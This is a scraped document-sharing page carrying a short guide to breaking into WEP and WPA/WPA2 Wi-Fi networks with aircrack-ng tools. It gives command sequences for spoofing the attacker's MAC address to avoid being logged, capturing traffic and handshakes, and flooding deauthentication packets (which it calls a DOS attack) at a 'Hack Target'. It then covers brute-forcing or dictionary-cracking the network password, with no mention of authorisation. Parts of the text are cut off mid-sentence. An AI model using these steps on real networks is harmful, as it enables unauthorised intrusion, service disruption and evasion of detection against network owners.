Hacking Encrypted Wireless Network

Size: px

Start display at page:

Download "Hacking Encrypted Wireless Network"

Christian Tucker
6 years ago
Views:

1 Hacking Encrypted Wireless Network Written by Fredrik Alm CompuTechSweden

2 REQUIREMENTS Software: Operating System: Linux kernel (Recommended: BackTrack 4 Final ) Download: Live CD (1570 MB) 3rd Party Software: aircrack-ng (Pre-Included in BackTrack) macchanger (Pre-Included in BackTrack) Hardware: Computer: A working standard Desktop/Laptop PC. (No Hard Drive Needed) Devices: A Linux compatible Wi-Fi device installed on your PC. Word Explanation AP = Access Point (Wi-Fi-Station) (ex. Router / Hack Target ) ## = A optional number (ex: 30 ) DEVICE = Computers Wi-Fi Device Card (ex: wlan0 ) BSSID = The AP:s MAC Address (ex: F4:32:B6:4C:DE:4A ) CHANNEL = The AP:s Active Wi-Fi Channel (ex: 6 WORDLIST = Path to a dictionary wordlist (ex: home/passwords.txt ) FAKEMAC = A optional faked MAC Address (ex: 00:11:22:33:44:66 ) CAPTUREFILE = The file were captured data is stored (ex: wepcapture- 01.cap ) Useful Keyboardshortcuts in Terminal Ctrl + C = In Terminal: Quitting an active process (ex: Datacapturing ) Key = Toggle between last used command.

3 Preparing: Wi-Fi Device Before attacking a wireless network, fake your MAC address on your Wi-Fi device to prevent users from logging your real ID. When experienced, use a complex faked MAC address so you don t reveal yourself. (Ex. 00:11:22:33:44:66 = Obvious for others but easy for you to remember.) (Ex. F4:32:B6:4C:DE:4A = Difficult to detect but hard for you to remember.) not, then type sudo -s in every terminal before executing commands.) # iwconfig Lists your compatible Wi-Fi Devices. Use this command to see the name of your device. Device name examples: wlan0, wifi0, eth0 # airmon-ng stop DEVICE Disables the monitor mode on your Wi-Fi device. # macchanger --mac FAKEMAC DEVICE Changes your MAC address to a optional fake MAC on your Wi-Fi device. # airmon-ng start DEVICE Enables the monitor mode on your Wi-Fi device.

4 Hacking: WEP Encryption Wired Equivalent Privacy (WEP) is an easily broken and therefore deprecated algorithm to secure wireless networks. This type of encryption can be directly Brute-Forced, without the need of a dictionary. When hacking, the attacker must capture a large amount of data, which later will be decrypted by brute-force to reveal the network password. When capturing more data, the chance of a successful decryption increases. To be on the safe side, capture packets and 500+ ARP: s. not, then type sudo -s in every terminal before executing the first command.) # airodump-ng DEVICE Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc. - Terminal 2 # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE Captures and saves encypted data/packets from the network on your computer. - Terminal 3 # aireplay-ng -3 -b BSSID h FAKEMAC DEVICE Capturing APR:s from the AP and increases the speed of the speeds the capture., 2 or 3 # ls Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wepcapture-01.cap) # aircrack-ng --bssid BSSID CAPTUREFILE Decrypts by Brute-force the captured data to finally reveal the network password.

5 Hacking: WPA/2 Encryption Wi-Fi Protected Access (WPA) is an more secure and therefore hardbroken algorithm to secure wireless networks. This type of encryption can t be directly Brute-Forced. After collection the so called WPA-Handshake, only a dictionary attack (wordlist with passwords) containing the correct password can break the encryption to reveal the network password. When capturing more data for a WPA-Handshake, it all depends on authorized computers to the network. It s when a computer connects to the network, that the WPA-Handshake can be captured. This can be helped with the De-Auth process in the following commands. Before hacking, download a big and good wordlist from the internet to use with the decryption. not, then type sudo -s in every terminal before executing the first command.) # airodump-ng DEVICE Lists all AP:s nearby, revealing their MAC addresses, active channels, encryption (ex. WEP / WPA) etc. - Terminal 2 # airodump-ng -c CHANNEL -w CAPTUREFILE --bssid BSSID DEVICE Captures and saves encypted data/packets from the network on your computer. - Terminal 3 # aireplay-ng -0 ## -a BSSID DEVICE Sends out a De-Auth Broadcast (DOS Attack) to force all computers on the wireless network to perform a reconnect. If successful, this might help capture the WPA-Handshake., 2 or 3 # ls Displays all files and folders in the current directory (root). Look for the CAPTUREFILE (ex. wpacapture-01.cap) # aircrack-ng CAPTUREFILE WORDLIST Decrypts by Dictionary the captured data to finally reveal the network password.

Gaining Access to encrypted networks

Gaining Access to encrypted networks Everything we have learned so far we can do it without having to connect to the target network. We can get more accurate info and launch more effective attacks if we